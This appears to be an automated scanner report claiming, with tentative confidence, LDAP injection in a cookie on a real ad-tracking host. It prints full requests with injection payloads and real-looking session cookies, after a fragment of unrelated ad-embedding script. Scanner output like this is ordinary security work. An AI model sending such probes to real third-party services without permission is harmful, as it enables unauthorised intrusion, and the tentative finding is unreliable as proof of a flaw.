document.write('<param name="allowFullScreen" value="false" />');
document.write('<param name="movie" value="http://c5.zedo.com//OzoDB/q/7/806020/V1/300x250_7060dg_krons_debtw_vtg.swf?clickTAG=http://xads.zedo.com/ads2/c%3Fa=806020%3Bn=305%3Bx=2333%3Bc=305002942,305002942%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=916%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bp%3D8%3Bf%3D749621%3Bh%3D749620%3Bo%3D20%3By%3D67%3Bv%3D1%3Bt%3Di%3Bk=http://media2.legacy.com/adlink/5306/1804573/0/170/AdId=1437456;BnId=1;itime=646950193;nodecode=yes;link=http://www.howlifeworks.com/a/a/?cid=7060dg" />');
document.write('<param name="quality" value="high" />');
document.write('<param name="bgcolor" value="#ffffff" />');
document.write('<param name="wmode" value="transparent">');
document.write('<embed src="http://c5.zedo.com//OzoDB/q/7/806020/V1/300x250_7060dg_krons_debtw_vtg.swf?clickTAG=http://xads.zedo.com/ads2/c%3Fa=806020%3Bn=305%3Bx=2333%3Bc=305002942,305002942%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=916%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bp%3D8%3Bf%3D749621%3Bh%3D749620%3Bo%3D20%3By%3D67%3Bv%3D1%3Bt%3Di%3Bk=http://media2.legacy.com/adlink/5306/1804573/0/170/AdId=1437456;BnId=1;itime=646950193;nodecode=yes;link=http://www.howlifeworks.com/a/a/?cid=7060dg" quality="high" bgcolor="#ffffff" width="300" height="250" name="300x250_7060dg_krons_debtw_vtg" align="middle" allowScriptAccess="sameDomain" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer" />');
document.write('</object>');

var zzChId = -1;
var zzPbId = -1;
zzChId='2942';zzPbId='916';
var zzAdTagId = '806020_'+zzChId+'_'+zzPb
...[SNIP]...
2.2. http://tap.rubiconproject.com/oz/sensor [put_2100 cookie]  previous

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_2100 cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the put_2100 cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /oz/sensor?p=rubicon&pc=6005/12414&cd=false&xt=3&k=&rd=drudgereport.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://intermrkts.vo.llnwd.net/o35/u/ExtraCode/DrudgeReport/intermarkets.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_2081=CA-00000000456885722; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=*)(sn=*; put_1197=3297869551067506954; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_1994=6ch47d7o8wtv; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; xdp_ti="7 Feb 2011 22:48:47 GMT"; lm="7 Feb 2011 22:48:47 GMT"; csi15=667425.js^1^1297190267^1297190267&329267.js^1^1297190250^1297190250&3178297.js^1^1297190221^1297190221&3178300.js^1^1297186286^1297186286&3187866.js^2^1297186264^1297186285&3173809.js^1^1297186265^1297186265&3187311.js^2^1297186228^1297186247&3144082.js^1^1297186229^1297186229&3174520.js^1^1297185849^1297185849; csi2=3185375.js^3^1297190198^1297195331&3187864.js^6^1297186263^1297195302&329265.js^1^1297195268^1297195268&3140640.js^1^1297195255^1297195255&2415222.js^2^1297186265^1297186287&3162307.js^2^1297186245^1297186249&3187064.js^1^1297186232^1297186232&3138805.js^3^1297185842^1297186231&3144080.js^1^1297186227^1297186227&667421.js^1^1297186143^1297186143&3174518.js^1^1297185827^1297185827; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; cd=false; dq=42|5|37|0; ruid=154d290e46adc1d6f373dd09^15^1297646572^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; ses9=12414^1; csi9=3147455.js^1^1297646572^1297646572; rpb=2399%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%266286%3D1%266073%3D1%264214%3D1%262119%3D1%265722%3D1%264939%3D1%264940%3D1%264222%3D1%266457%3D1%266276%3D1%264212%3D1%266356%3D1%262372%3D1%264944%3D1%262374%3D1%264970%3D1%264894%3D1; put_1986=4760492999213801733

Response 1

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 14:49:46 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 14-Feb-2012 14:49:46 GMT; Path=/
Set-Cookie: dq=43|5|38|0; Expires=Tue, 14-Feb-2012 14:49:46 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6005/12414&cd=false&xt=3&k=&rd=drudgereport.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://intermrkts.vo.llnwd.net/o35/u/ExtraCode/DrudgeReport/intermarkets.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_2081=CA-00000000456885722; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=*)!(sn=*; put_1197=3297869551067506954; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_1994=6ch47d7o8wtv; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; xdp_ti="7 Feb 2011 22:48:47 GMT"; lm="7 Feb 2011 22:48:47 GMT"; csi15=667425.js^1^1297190267^1297190267&329267.js^1^1297190250^1297190250&3178297.js^1^1297190221^1297190221&3178300.js^1^1297186286^1297186286&3187866.js^2^1297186264^1297186285&3173809.js^1^1297186265^1297186265&3187311.js^2^1297186228^1297186247&3144082.js^1^1297186229^1297186229&3174520.js^1^1297185849^1297185849; csi2=3185375.js^3^1297190198^1297195331&3187864.js^6^1297186263^1297195302&329265.js^1^1297195268^1297195268&3140640.js^1^1297195255^1297195255&2415222.js^2^1297186265^1297186287&3162307.js^2^1297186245^1297186249&3187064.js^1^1297186232^1297186232&3138805.js^3^1297185842^1297186231&3144080.js^1^1297186227^1297186227&667421.js^1^1297186143^1297186143&3174518.js^1^1297185827^1297185827; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; cd=false; dq=42|5|37|0; ruid=154d290e46adc1d6f373dd09^15^1297646572^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; ses9=12414^1; csi9=3147455.js^1^1297646572^1297646572; rpb=2399%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%266286%3D1%266073%3D1%264214%3D1%262119%3D1%265722%3D1%264939%3D1%264940%3D1%264222%3D1%266457%3D1%266276%3D1%264212%3D1%266356%3D1%262372%3D1%264944%3D1%262374%3D1%264970%3D1%264894%3D1; put_1986=4760492999213801733

Response 2

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 14:49:46 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 09:00:46 CST 2011.